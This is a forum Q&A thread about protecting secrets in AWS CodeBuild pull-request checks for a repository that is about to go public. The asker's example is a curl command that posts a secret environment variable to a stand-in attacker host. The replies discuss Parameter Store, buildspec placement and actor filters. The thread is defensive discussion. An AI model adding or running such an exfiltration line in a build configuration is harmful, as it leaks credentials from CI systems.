# Prevent GitHub PR checks running without manual intervention

Tags: github, continuous-integration, credentials

I have ran into a situation where I have a repo on GitHub that I am looking to make public.

Currently, one of the PR checks runs CI tests on AWS CodeBuild.

Because of the nature of the tests, there are environment variables that contain secrets. The results/logs from the build output will not be public, which is one good thing.

AWS CodeBuild uses the `buildspec.yml` file to run commands in CI.

If I were to have an environment variable, for example `$SECRET_THING`, an attacker would be able to simply open a PR, adding to `buildspec.yml`, for example:

```
  - curl -X POST -d"thesecret=$SECRET_THING" https://mwahahahaha.com/grab_it
```

Which would then send themselves the secret.

Using either a setting in GitHub, the GitHub checks API or CodeBuild, is there a way that would require manual intervention to run the check, preferably after a code review? (eg. a button clickable only by an authorised collaborator on the PR page)

Answer (score 0):

Don't use plain text environment variable, instead use "env > parameter-store" to store your secret. If you are using CodeBuild's console UI you can create the paramater store entry from "advanced > environment 
variables > type: parameter store" https://aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax

Also, CodeBuild allows you to define the buildspec as part of the project. This way the buildspec yml file is not present in your repository.

Note: CodeBuild only allows repo owner or admin to create the webhook.

Update: @Chris CodeBuild supports filter groups for PR builds. Documentation @ https://docs.aws.amazon.com/codebuild/latest/userguide/sample-github-pull-request.html#sample-github-pull-request-filter-webhook-events-console. You can filter on the actor to ensure that only trusted collaborators can trigger a build for PR or push events.

Comment: The environment variables from parameter store are only encrypted at rest. When they are used in CodeBuild, they are set as environment variables that are plain text - so the same attack can be done.

Comment: Build scripts generally just run test scripts / rake tasks / docker builds etc, so unfortunately the attack could just be moved to one of the scripts that `buildspec.yml` runs, even if you don't have access to change the `buildspec.yml` file itself.